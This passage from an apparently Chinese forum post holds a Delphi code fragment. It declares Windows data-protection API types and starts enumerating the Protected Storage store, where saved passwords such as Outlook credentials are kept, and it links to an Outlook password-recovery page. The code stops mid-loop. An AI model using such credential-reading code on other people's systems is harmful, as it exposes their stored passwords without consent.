type _CRYPTPROTECT_PROMPTSTRUCT=record<br>&nbsp; cbSize:DWORD;<br> &nbsp; dwPromptFlags:DWORD;<br> &nbsp; hwndApp:HWND;<br> &nbsp;szPrompt:LPCWSTR;<br>&nbsp; end;<br>&nbsp;CRYPTPROTECT_PROMPTSTRUCT=_CRYPTPROTECT_PROMPTSTRUCT;<br>&nbsp;PCRYPTPROTECT_PROMPTSTRUCT=^_CRYPTPROTECT_PROMPTSTRUCT;<br><br> type _CRYPTOAPI_BLOB=record<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; cbData:DWORD; &nbsp; &nbsp; &nbsp;//数据的长度<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pbData:PByte; &nbsp; &nbsp; &nbsp; //指向数据的指针<br>&nbsp; end;<br>&nbsp; DATA_BLOB=_CRYPTOAPI_BLOB;<br>&nbsp; PDATA_BLOB=^_CRYPTOAPI_BLOB;<br><br>&nbsp; type<br>&nbsp; CFNPCryptProtectData=function(<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pDataIn:PDATA_BLOB; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;//输入数据,明文<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;szDataDescr:LPCWSTR; &nbsp; &nbsp; &nbsp; //描述信息<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pOptionalEntropy:PDATA_BLOB; &nbsp; //额外的保护信息<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pvReserved:Pointer; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;//保留参数,必须为NULL<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pPromptStruct:PCRYPTPROTECT_PROMPTSTRUCT; //提示对话框结构<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;dwFlags:DWORD; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;//标志位<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pDataOut:PDATA_BLOB &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;//输出数据,密文<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;):BOOL;stdcall;<br>procedure TForm1.Button1Click(Sender: TObject);<br>const<br>PST_KEY_LOCAL_MACHINE=$00000001;<br>PST_KEY_CURRENT_USER=$00000000;<br>PST_PROMPT_QUERY=$00000008;<br><br>PST_E_OK=$00000000;<br><br>PST_E_TYPE_EXISTS=$800C0004;<br>var<br>r:HRESULT;<br>len:integer;<br>hMod:HMODULE;<br> <br>guidProviderID:TGUID;//, guidItemType, guidItemSubtype;<br>///IPStorePtr spPstore;<br>spPstore:^IPStore;<br>type<br>PIPStore=^IPStore;<br>PPIPStore=^PIPStore;<br>type<br>&nbsp; CPFNPStoreCreateInstance=function(ppProvider:PPIPStore;pProviderID:PGUID;pReserved:Pointer;dwFlags:DWORD):HRESULT;stdcall;<br>var<br> fnpPStoreCreateInstance:CPFNPStoreCreateInstance;<br>&nbsp; guidItemType:TGUID;<br><br> guidItemSubtype:TGUID;<br> <br> spEnumTypes:IEnumPStoreTypes;<br> spEnumSubTypes:IEnumPStoreTypes; //IEnumPStoreTypes<br> spEnumItems:IEnumPStoreItems; &nbsp;//IEnumPStoreItems<br><br> <br> pszwItem:PWideChar;<br> strItem:string;<br><br> cbData:DWORD;<br> pbData:array[0..1023]of byte;<br> pInfo:PUserType3;//^_PST_TYPEINFO;<br> //HTREEITEM hItem, hParent, hRoot;<br>&nbsp; str, strData,strPass:string;<br>&nbsp; &nbsp;Temp:DWORD;<br>begin<br>hMod :=LoadLibrary('Pstorec.dll');<br><br>fnpPStoreCreateInstance :=GetProcAddress(hMod, 'PStoreCreateInstance');<br>if(fnpPStoreCreateInstance(@spPstore, nil, nil, 0) &lt;&gt; PST_E_OK) then<br> begin<br> ShowMessage('CPFNPStoreCreateInstance failed.');<br> FreeLibrary(hMod);<br> CoUninitialize();<br> Exit;<br> end;<br><br>r := spPstore.EnumTypes(PST_KEY_CURRENT_USER, 0, spEnumTypes);<br>Temp:=0;<br>while(spEnumTypes.Next(1, guidItemType,@temp)=NOERROR)do<br>begin
 
http://www.lostpassword.com/outlook.htm
 
后退
顶部